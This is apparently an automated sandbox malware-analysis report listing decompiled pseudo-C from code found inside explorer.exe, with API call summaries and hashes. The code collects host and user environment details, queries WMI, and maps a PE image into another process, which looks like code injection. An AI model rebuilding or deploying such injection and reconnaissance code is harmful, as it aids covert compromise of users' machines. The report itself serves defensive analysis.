                            				if(E0008BB8D( *_t88) == 0) {
                            					_t90 = E0008BA62(_t178, _t222);
                            					__eflags = _t90;
                            					_t181 = (0 | _t90 > 0x00000000) + 1;
                            					__eflags = _t181;
                            					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
                            				} else {
                            					 *((intOrPtr*)(_t222 + 0x214)) = 3;
                            				}
                            				_t12 = _t222 + 0x220; // 0x220
                            				 *((intOrPtr*)(_t222 + 0x218)) = E0008E3F1(_t12);
                            				 *((intOrPtr*)(_t222 + 0x21c)) = E0008E3B6(_t12);
                            				_push( &_v16);
                            				 *(_t222 + 0x224) = _t162;
                            				_push( &_v8);
                            				_v12 = 0x80;
                            				_push( &_v692);
                            				_v8 = 0x100;
                            				_push( &_v12);
                            				_t22 = _t222 + 0x114; // 0x114
                            				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
                            				_t95 =  *0x9e68c; // 0xc2fab8
                            				_push(0);
                            				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
                            					GetLastError();
                            				}
                            				_t97 =  *0x9e694; // 0xc2fa48
                            				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
                            				_t26 = _t222 + 0x228; // 0x228
                            				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
                            				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
                            				GetLastError();
                            				_t31 = _t222 + 0x228; // 0x228
                            				 *((intOrPtr*)(_t222 + 0x434)) = E00088FBE(_t31, _t98);
                            				_t34 = _t222 + 0x114; // 0x114
                            				_t103 = E0008B7A8(_t34,  &_v692);
                            				_t35 = _t222 + 0xb0; // 0xb0
                            				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
                            				_push(_t35);
                            				E0008B67D(_t103, _t35, _t98, _t241);
                            				_t37 = _t222 + 0xb0; // 0xb0
                            				_t105 = _t37;
                            				_t38 = _t222 + 0xd0; // 0xd0
                            				_t164 = _t38;
                            				if(_t105 != 0) {
                            					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
                            					if(_t159 > 0) {
                            						_t164[_t159] = 0;
                            					}
                            				}
                            				_t41 = _t222 + 0x438; // 0x438
                            				_t42 = _t222 + 0x228; // 0x228
                            				E00088FD8(_t42, _t41);
                            				_t43 = _t222 + 0xb0; // 0xb0
                            				_t108 = E0008D400(_t43, E0008C379(_t43), 0);
                            				_t44 = _t222 + 0x100c; // 0x100c
                            				E0008B88A(_t108, _t44, _t241);
                            				_t199 = GetCurrentProcess();
                            				 *((intOrPtr*)(_t222 + 0x101c)) = E0008BBDF(_t110);
                            				memset(_t222, 0, 0x9c);
                            				_t224 = _t223 + 0xc;
                            				_t222->dwOSVersionInfoSize = 0x9c;
                            				GetVersionExA(_t222);
                            				_t167 =  *0x9e684; // 0xc2f8f0
                            				_t115 = 0;
                            				_v8 = 0;
                            				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
                            					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
                            					_t115 = _v8;
                            				}
                            				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
                            				if(_t115 == 0) {
                            					GetSystemInfo( &_v52);
                            					_t117 = _v52.dwOemId & 0x0000ffff;
                            				} else {
                            					_t117 = 9;
                            				}
                            				_t54 = _t222 + 0x1020; // 0x1020
                            				_t168 = _t54;
                            				 *(_t222 + 0x9c) = _t117;
                            				GetWindowsDirectoryW(_t168, 0x104);
                            				_t119 = E000895E1(_t199, 0x10c);
                            				_t200 =  *0x9e684; // 0xc2f8f0
                            				_t218 = _t119;
                            				 *_t224 = 0x104;
                            				_push( &_v704);
                            				_push(_t218);
                            				_v8 = _t218;
                            				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
                            					_t154 =  *0x9e684; // 0xc2f8f0
                            					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
                            				}
                            				E000885D5( &_v8);
                            				_t124 =  *0x9e684; // 0xc2f8f0
                            				_t61 = _t222 + 0x1434; // 0x1434
                            				_t219 = _t61;
                            				 *_t224 = 0x209;
                            				_push(_t219);
                            				_push(L"USERPROFILE");
                            				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
                            					E00089640(_t219, 0x105, L"%s\\%s", _t168);
                            					_t152 =  *0x9e684; // 0xc2f8f0
                            					_t224 =  &(_t224[5]);
                            					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
                            				}
                            				_push(0x20a);
                            				_t64 = _t222 + 0x122a; // 0x122a
                            				_t169 = L"TEMP";
                            				_t127 =  *0x9e684; // 0xc2f8f0
                            				_push(_t169);
                            				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
                            					_t149 =  *0x9e684; // 0xc2f8f0
                            					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
                            				}
                            				_push(0x40);
                            				_t220 = L"SystemDrive";
                            				_push( &_v180);
                            				_t130 =  *0x9e684; // 0xc2f8f0
                            				_push(_t220);
                            				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
                            					_t147 =  *0x9e684; // 0xc2f8f0
                            					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
                            				}
                            				_v8 = 0x7f;
                            				_t72 = _t222 + 0x199c; // 0x199c
                            				_t134 =  *0x9e684; // 0xc2f8f0
                            				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
                            				_t75 = _t222 + 0x100c; // 0x100c
                            				E00092301(E0008D400(_t75, E0008C379(_t75), 0),  &_v2680);
                            				_t76 = _t222 + 0x1858; // 0x1858
                            				E000922D3( &_v2680, _t76, 0x20);
                            				_t79 = _t222 + 0x1878; // 0x1878
                            				E0008902D(1, _t79, 0x14, 0x1e,  &_v2680);
                            				 *((intOrPtr*)(_t222 + 0x1898)) = E0008CD33(_t79);
                            				return _t222;
                            			}


                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • GetCurrentProcessId.KERNEL32 ref: 0008D046
                            • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 0008D082
                            • GetCurrentProcess.KERNEL32 ref: 0008D09F
                            • GetLastError.KERNEL32 ref: 0008D13E
                            • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 0008D16C
                            • GetLastError.KERNEL32 ref: 0008D172
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 0008D1C7
                            • GetCurrentProcess.KERNEL32 ref: 0008D20E
                            • memset.MSVCRT ref: 0008D229
                            • GetVersionExA.KERNEL32(00000000), ref: 0008D234
                            • GetCurrentProcess.KERNEL32(00000100), ref: 0008D24E
                            • GetSystemInfo.KERNEL32(?), ref: 0008D26A
                            • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0008D287
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
                            • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                            • API String ID: 3876402152-2706916422
                            • Opcode ID: 12dfeda50fcfa05c5d9c49e5a909d2d4da4cbeaac424930ed5d12b2800c1f241
                            • Instruction ID: 25e8395d91437c6831676a43eef48ae52fba165dceb8ee9639bfc079f816c02c
                            • Opcode Fuzzy Hash: 12dfeda50fcfa05c5d9c49e5a909d2d4da4cbeaac424930ed5d12b2800c1f241
                            • Instruction Fuzzy Hash: 77B16071600704AFE750EB70DD89FEA77E8BF58300F00456AF59AD7292EB74AA04CB21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 50%
                            			E0008DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				char _v24;
                            				void* _v28;
                            				signed int _v32;
                            				char _v36;
                            				intOrPtr _v40;
                            				signed int _v44;
                            				char _v48;
                            				char _v52;
                            				intOrPtr _v56;
                            				signed int _v60;
                            				char* _v72;
                            				signed short _v80;
                            				signed int _v84;
                            				char _v88;
                            				char _v92;
                            				char _v96;
                            				intOrPtr _v100;
                            				char _v104;
                            				char _v616;
                            				intOrPtr* _t159;
                            				char _t165;
                            				signed int _t166;
                            				signed int _t173;
                            				signed int _t178;
                            				signed int _t186;
                            				intOrPtr* _t187;
                            				signed int _t188;
                            				signed int _t192;
                            				intOrPtr* _t193;
                            				intOrPtr _t200;
                            				intOrPtr* _t205;
                            				signed int _t207;
                            				signed int _t209;
                            				intOrPtr* _t210;
                            				intOrPtr _t212;
                            				intOrPtr* _t213;
                            				signed int _t214;
                            				char _t217;
                            				signed int _t218;
                            				signed int _t219;
                            				signed int _t230;
                            				signed int _t235;
                            				signed int _t242;
                            				signed int _t243;
                            				signed int _t244;
                            				signed int _t245;
                            				intOrPtr* _t247;
                            				intOrPtr* _t251;
                            				signed int _t252;
                            				intOrPtr* _t253;
                            				void* _t255;
                            				intOrPtr* _t261;
                            				signed int _t262;
                            				signed int _t283;
                            				signed int _t289;
                            				char* _t298;
                            				void* _t320;
                            				signed int _t322;
                            				intOrPtr* _t323;
                            				intOrPtr _t324;
                            				signed int _t327;
                            				intOrPtr* _t328;
                            				intOrPtr* _t329;
                            
                            				_v32 = _v32 & 0x00000000;
                            				_v60 = _v60 & 0x00000000;
                            				_v56 = __edx;
                            				_v100 = __ecx;
                            				_t159 = E0008D523(__ecx);
                            				_t251 = _t159;
                            				_v104 = _t251;
                            				if(_t251 == 0) {
                            					return _t159;
                            				}
                            				_t320 = E00088604(0x10);
                            				_v36 = _t320;
                            				_pop(_t255);
                            				if(_t320 == 0) {
                            					L53:
                            					E0008861A( &_v60, 0xfffffffe);
                            					E0008D5D7( &_v104);
                            					return _t320;
                            				}
                            				_t165 = E000895E1(_t255, 0x536);
                            				 *_t328 = 0x609;
                            				_v52 = _t165;
                            				_t166 = E000895E1(_t255);
                            				_push(0);
                            				_push(_v56);
                            				_v20 = _t166;
                            				_push(_t166);
                            				_push(_a4);
                            				_t322 = E000892E5(_t165);
                            				_v60 = _t322;
                            				E000885D5( &_v52);
                            				E000885D5( &_v20);
                            				_t329 = _t328 + 0x20;
                            				if(_t322 != 0) {
                            					_t323 = __imp__#2;
                            					_v40 =  *_t323(_t322);
                            					_t173 = E000895E1(_t255, 0x9e4);
                            					_v20 = _t173;
                            					_v52 =  *_t323(_t173);
                            					E000885D5( &_v20);
                            					_t324 = _v40;
                            					_t261 =  *_t251;
                            					_t252 = 0;
                            					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                            					__eflags = _t178;
                            					if(_t178 != 0) {
                            						L52:
                            						__imp__#6(_t324);
                            						__imp__#6(_v52);
                            						goto L53;
                            					}
                            					_t262 = _v32;
                            					_v28 = 0;
                            					_v20 = 0;
                            					__eflags = _t262;
                            					if(_t262 == 0) {
                            						L49:
                            						 *((intOrPtr*)( *_t262 + 8))(_t262);
                            						__eflags = _t252;
                            						if(_t252 == 0) {
                            							E0008861A( &_v36, 0);
                            							_t320 = _v36;
                            						} else {
                            							 *(_t320 + 8) = _t252;
                            							 *_t320 = E000891E3(_v100);
                            							 *((intOrPtr*)(_t320 + 4)) = E000891E3(_v56);
                            						}
                            						goto L52;
                            					} else {
                            						goto L6;
                            					}
                            					while(1) {
                            						L6:
                            						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                            						__eflags = _t186;
                            						if(_t186 != 0) {
                            							break;
                            						}
                            						_v16 = 0;
                            						_v48 = 0;
                            						_v12 = 0;
                            						_v24 = 0;
                            						__eflags = _v84;
                            						if(_v84 == 0) {
                            							break;
                            						}
                            						_t187 = _v28;
                            						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                            						__eflags = _t188;
                            						if(_t188 >= 0) {
                            							__imp__#20(_v24, 1,  &_v16);
                            							__imp__#19(_v24, 1,  &_v48);
                            							_t46 = _t320 + 0xc; // 0xc
                            							_t253 = _t46;
                            							_t327 = _t252 << 3;
                            							_t47 = _t327 + 8; // 0x8
                            							_t192 = E00088698(_t327, _t47);
                            							__eflags = _t192;
                            							if(_t192 == 0) {
                            								__imp__#16(_v24);
                            								_t193 = _v28;
                            								 *((intOrPtr*)( *_t193 + 8))(_t193);
                            								L46:
                            								_t252 = _v20;
                            								break;
                            							}
                            							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                            							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00088604( *(_t327 +  *_t253) << 3);
                            							_t200 =  *_t253;
                            							__eflags =  *(_t327 + _t200 + 4);
                            							if( *(_t327 + _t200 + 4) == 0) {
                            								_t136 = _t320 + 0xc; // 0xc
                            								E0008861A(_t136, 0);
                            								E0008861A( &_v36, 0);
                            								__imp__#16(_v24);
                            								_t205 = _v28;
                            								 *((intOrPtr*)( *_t205 + 8))(_t205);
                            								_t320 = _v36;
                            								goto L46;
                            							}
                            							_t207 = _v16;
                            							while(1) {
                            								_v12 = _t207;
                            								__eflags = _t207 - _v48;
                            								if(_t207 > _v48) {
                            									break;
                            								}
                            								_v44 = _v44 & 0x00000000;
                            								_t209 =  &_v12;
                            								__imp__#25(_v24, _t209,  &_v44);
                            								__eflags = _t209;
                            								if(_t209 < 0) {
                            									break;
                            								}
                            								_t212 = E000891E3(_v44);
                            								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                            								_t213 = _v28;
                            								_t281 =  *_t213;
                            								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                            								__eflags = _t214;
                            								if(_t214 < 0) {
                            									L39:
                            									__imp__#6(_v44);
                            									_t207 = _v12 + 1;
                            									__eflags = _t207;
                            									continue;
                            								}
                            								_v92 = E000895E1(_t281, 0x250);
                            								 *_t329 = 0x4cc;
                            								_t217 = E000895E1(_t281);
                            								_t283 = _v80;
                            								_v96 = _t217;
                            								_t218 = _t283 & 0x0000ffff;
                            								__eflags = _t218 - 0xb;
                            								if(__eflags > 0) {
                            									_t219 = _t218 - 0x10;
                            									__eflags = _t219;
                            									if(_t219 == 0) {
                            										L35:
                            										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
                            										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                            										__eflags = _t289;
                            										if(_t289 == 0) {
                            											L38:
                            											E000885D5( &_v92);
                            											E000885D5( &_v96);
                            											__imp__#9( &_v80);
                            											goto L39;
                            										}
                            										_push(_v72);
                            										_push(L"%d");
                            										L37:
                            										_push(0xc);
                            										_push(_t289);
                            										E00089640();
                            										_t329 = _t329 + 0x10;
                            										goto L38;
                            									}
                            									_t230 = _t219 - 1;
                            									__eflags = _t230;
                            									if(_t230 == 0) {
                            										L33:
                            										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
                            										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                            										__eflags = _t289;
                            										if(_t289 == 0) {
                            											goto L38;
                            										}
                            										_push(_v72);
                            										_push(L"%u");
                            										goto L37;
                            									}
                            									_t235 = _t230 - 1;
                            									__eflags = _t235;
                            									if(_t235 == 0) {
                            										goto L33;
                            									}
                            									__eflags = _t235 == 1;
                            									if(_t235 == 1) {
                            										goto L33;
                            									}
                            									L28:
                            									__eflags = _t283 & 0x00002000;
                            									if((_t283 & 0x00002000) == 0) {
                            										_v88 = E000895E1(_t283, 0x219);
                            										E00089640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                            										E000885D5( &_v88);
                            										_t329 = _t329 + 0x18;
                            										_t298 =  &_v616;
                            										L31:
                            										_t242 = E000891E3(_t298);
                            										L32:
                            										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                            										goto L38;
                            									}
                            									_t242 = E0008DA20( &_v80);
                            									goto L32;
                            								}
                            								if(__eflags == 0) {
                            									__eflags = _v72 - 0xffff;
                            									_t298 = L"TRUE";
                            									if(_v72 != 0xffff) {
                            										_t298 = L"FALSE";
                            									}
                            									goto L31;
                            								}
                            								_t243 = _t218 - 1;
                            								__eflags = _t243;
                            								if(_t243 == 0) {
                            									goto L38;
                            								}
                            								_t244 = _t243 - 1;
                            								__eflags = _t244;
                            								if(_t244 == 0) {
                            									goto L35;
                            								}
                            								_t245 = _t244 - 1;
                            								__eflags = _t245;
                            								if(_t245 == 0) {
                            									goto L35;
                            								}
                            								__eflags = _t245 != 5;
                            								if(_t245 != 5) {
                            									goto L28;
                            								}
                            								_t298 = _v72;
                            								goto L31;
                            							}
                            							__imp__#16(_v24);
                            							_t210 = _v28;
                            							 *((intOrPtr*)( *_t210 + 8))(_t210);
                            							_t252 = _v20;
                            							L42:
                            							_t262 = _v32;
                            							_t252 = _t252 + 1;
                            							_v20 = _t252;
                            							__eflags = _t262;
                            							if(_t262 != 0) {
                            								continue;
                            							}
                            							L48:
                            							_t324 = _v40;
                            							goto L49;
                            						}
                            						_t247 = _v28;
                            						 *((intOrPtr*)( *_t247 + 8))(_t247);
                            						goto L42;
                            					}
                            					_t262 = _v32;
                            					goto L48;
                            				} else {
                            					E0008861A( &_v36, _t322);
                            					_t320 = _v36;
                            					goto L53;
                            				}
                            			}

                            APIs
                              • Part of subcall function 0008D523: CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                              • Part of subcall function 0008D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                              • Part of subcall function 0008D523: CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
                              • Part of subcall function 0008D523: SysAllocString.OLEAUT32(00000000), ref: 0008D569
                              • Part of subcall function 0008D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • SysAllocString.OLEAUT32(00000000), ref: 0008DBE5
                            • SysAllocString.OLEAUT32(00000000), ref: 0008DBF9
                            • SysFreeString.OLEAUT32(?), ref: 0008DF82
                            • SysFreeString.OLEAUT32(?), ref: 0008DF8B
                              • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                            • String ID: FALSE$TRUE
                            • API String ID: 1290676130-1412513891
                            • Opcode ID: cef9d765e2338686624ad15c9d49e4584251ea0903c5bed5b6d50983f8e298f7
                            • Instruction ID: 1b20700aac11c4dae470c7e010e7ba276413c48b0cffd0f81d1503e5e528a265
                            • Opcode Fuzzy Hash: cef9d765e2338686624ad15c9d49e4584251ea0903c5bed5b6d50983f8e298f7
                            • Instruction Fuzzy Hash: 58E15E71E00219AFDF54FFA4C985EEEBBB9FF48310F14815AE545AB292DB31A901CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 59%
                            			E0008C6C0(intOrPtr __ecx, intOrPtr __edx) {
                            				signed int _v8;
                            				char _v12;
                            				char _v16;
                            				intOrPtr _v20;
                            				char _v24;
                            				char _v28;
                            				char _v32;
                            				intOrPtr _v36;
                            				struct HINSTANCE__* _v40;
                            				char _v44;
                            				char _v56;
                            				char _v72;
                            				struct _WNDCLASSEXA _v120;
                            				intOrPtr _t69;
                            				intOrPtr _t71;
                            				intOrPtr _t75;
                            				intOrPtr _t80;
                            				intOrPtr _t92;
                            				intOrPtr _t95;
                            				intOrPtr _t96;
                            				struct HWND__* _t106;
                            				intOrPtr* _t113;
                            				struct HINSTANCE__* _t116;
                            				intOrPtr _t120;
                            				intOrPtr _t126;
                            				intOrPtr _t131;
                            				intOrPtr _t134;
                            				intOrPtr _t136;
                            				intOrPtr _t139;
                            				char _t140;
                            				intOrPtr _t141;
                            
                            				_t69 =  *0x9e688; // 0xb0000
                            				_t126 = __ecx;
                            				_t134 = __edx;
                            				_t116 = 0;
                            				_v36 = __edx;
                            				_v16 = 0;
                            				_v44 = 0;
                            				_v40 = 0;
                            				_v12 = 0;
                            				_v8 = 0;
                            				_v24 = 0;
                            				_v20 = __ecx;
                            				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
                            					E0008E23E(0x1f4);
                            					_t116 = 0;
                            				}
                            				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                            				_v28 = _t116;
                            				if( *_t113 != 0x4550) {
                            					L12:
                            					if(_v8 != 0) {
                            						_t75 =  *0x9e780; // 0x0
                            						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
                            						_v8 = _v8 & 0x00000000;
                            					}
                            					L14:
                            					if(_v12 != 0) {
                            						_t136 =  *0x9e780; // 0x0
                            						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
                            					}
                            					if(_v16 != 0) {
                            						_t71 =  *0x9e780; // 0x0
                            						 *((intOrPtr*)(_t71 + 0x20))(_v16);
                            					}
                            					return _v8;
                            				}
                            				_push(_t116);
                            				_push(0x8000000);
                            				_v44 =  *((intOrPtr*)(_t113 + 0x50));
                            				_push(0x40);
                            				_push( &_v44);
                            				_push(_t116);
                            				_push(0xe);
                            				_push( &_v16);
                            				_t80 =  *0x9e780; // 0x0
                            				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
                            					goto L12;
                            				}
                            				_v120.style = 0xb;
                            				_v120.cbSize = 0x30;
                            				_v120.lpszClassName =  &_v56;
                            				asm("movsd");
                            				_v120.lpfnWndProc = DefWindowProcA;
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsb");
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsw");
                            				asm("movsb");
                            				_v120.cbWndExtra = 0;
                            				_v120.lpszMenuName = 0;
                            				_v120.cbClsExtra = 0;
                            				_v120.hInstance = 0;
                            				if(RegisterClassExA( &_v120) != 0) {
                            					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
                            					if(_t106 != 0) {
                            						DestroyWindow(_t106);
                            						UnregisterClassA( &_v56, 0);
                            					}
                            				}
                            				_t139 =  *0x9e780; // 0x0
                            				_push(0x40);
                            				_push(0);
                            				_push(2);
                            				_push( &_v24);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push( &_v12);
                            				_push(GetCurrentProcess());
                            				_push(_v16);
                            				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
                            					_t126 = _v20;
                            					goto L12;
                            				} else {
                            					_push(0x40);
                            					_push(0);
                            					_push(2);
                            					_push( &_v24);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_t126 = _v20;
                            					_push( &_v8);
                            					_t92 =  *0x9e780; // 0x0
                            					_push(_t126);
                            					_push(_v16);
                            					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
                            						goto L12;
                            					}
                            					_t140 = E00088669( *0x9e688, 0x1ac4);
                            					_v32 = _t140;
                            					if(_t140 == 0) {
                            						goto L12;
                            					}
                            					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
                            					_t95 =  *0x9e684; // 0xc2f8f0
                            					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
                            					_t120 =  *0x9e684; // 0xc2f8f0
                            					_t131 = _t96;
                            					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
                            					E0008861A( &_v32, 0x1ac4);
                            					_t141 =  *0x9e688; // 0xb0000
                            					 *0x9e688 = _t131;
                            					E000886E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
                            					E0008C63F(_v12, _v8, _v36);
                            					 *0x9e688 = _t141;
                            					goto L14;
                            				}
                            			}

                            APIs
                            • RegisterClassExA.USER32 ref: 0008C785
                            • CreateWindowExA.USER32 ref: 0008C7B0
                            • DestroyWindow.USER32 ref: 0008C7BB
                            • UnregisterClassA.USER32(?,00000000), ref: 0008C7C6
                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0008C7E2
                            • GetCurrentProcess.KERNEL32(00000000), ref: 0008C8DB
                              • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
                            • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                            • API String ID: 3082384575-2319545179
                            • Opcode ID: 8bb081a5582da799488192e2f74a1ae18185b5fa3b829c330fd2e48e9cfd5350
                            • Instruction ID: d3e88f71527c21399528f0c4bf061e6e508ee729baa66594f0f525f79852064d
                            • Opcode Fuzzy Hash: 8bb081a5582da799488192e2f74a1ae18185b5fa3b829c330fd2e48e9cfd5350
                            • Instruction Fuzzy Hash: 49712971900249EFEB10DF95DC49EEEBBB9FB89710F14406AF605A7290DB74AE04CB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 78%
                            			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
                            				char _v8;
                            				char _v16;
                            				short _v144;
                            				short _v664;
                            				void* _t19;
                            				struct HINSTANCE__* _t22;
                            				long _t23;
                            				long _t24;
                            				char* _t27;
                            				WCHAR* _t32;
                            				long _t33;
                            				intOrPtr _t37;
                            				intOrPtr _t38;
                            				void* _t49;
                            				int _t53;
                            				void* _t54;
                            				intOrPtr* _t55;
                            				void* _t57;
                            
                            				_t49 = __edx;
                            				OutputDebugStringA("Hello qqq");
                            				if(_a8 != 1) {
                            					if(_a8 != 0) {
                            						L12:
                            						return 1;
                            					}
                            					SetLastError(0xaa);
                            					L10:
                            					return 0;
                            				}
                            				E000885EF();
                            				_t19 = E0008980C( &_v16);
                            				_t57 = _t49;
                            				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
                            					goto L12;
                            				} else {
                            					E00088F78();
                            					GetModuleHandleA(0);
                            					_t22 = _a4;
                            					 *0x9e69c = _t22;
                            					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
                            					_t24 = GetLastError();
                            					if(_t23 != 0 && _t24 != 0x7a) {
                            						memset( &_v144, 0, 0x80);
                            						_t55 = _t54 + 0xc;
                            						_t53 = 0;
                            						do {
                            							_t27 = E000895C7(_t53);
                            							_a8 = _t27;
                            							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
                            							E000885C2( &_a8);
                            							_t53 = _t53 + 1;
                            						} while (_t53 < 0x2710);
                            						E00092A5B( *0x9e69c);
                            						 *_t55 = 0x7c3;
                            						 *0x9e684 = E0008E1BC(0x9ba28, 0x11c);
                            						 *_t55 = 0xb4e;
                            						_t32 = E000895E1(0x9ba28);
                            						_a8 = _t32;
                            						_t33 = GetFileAttributesW(_t32);
                            						_push( &_a8);
                            						if(_t33 == 0xffffffff) {
                            							E000885D5();
                            							_v8 = 0;
                            							_t37 =  *0x9e684; // 0xc2f8f0
                            							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E00085E06, 0, 0,  &_v8);
                            							 *0x9e6a8 = _t38;
                            							if(_t38 == 0) {
                            								goto L10;
                            							}
                            							goto L12;
                            						}
                            						E000885D5();
                            					}
                            					goto L10;
                            				}
                            			}


                            APIs
                            • OutputDebugStringA.KERNEL32(Hello qqq), ref: 00085F92
                            • SetLastError.KERNEL32(000000AA), ref: 000860D7
                              • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                              • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
                              • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
                            • GetModuleHandleA.KERNEL32(00000000), ref: 00085FCC
                            • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00085FE7
                            • GetLastError.KERNEL32 ref: 00085FEF
                            • memset.MSVCRT ref: 00086013
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 00086035
                            • GetFileAttributesW.KERNEL32(00000000), ref: 00086083
                            Strings
                            Memory Dump Source
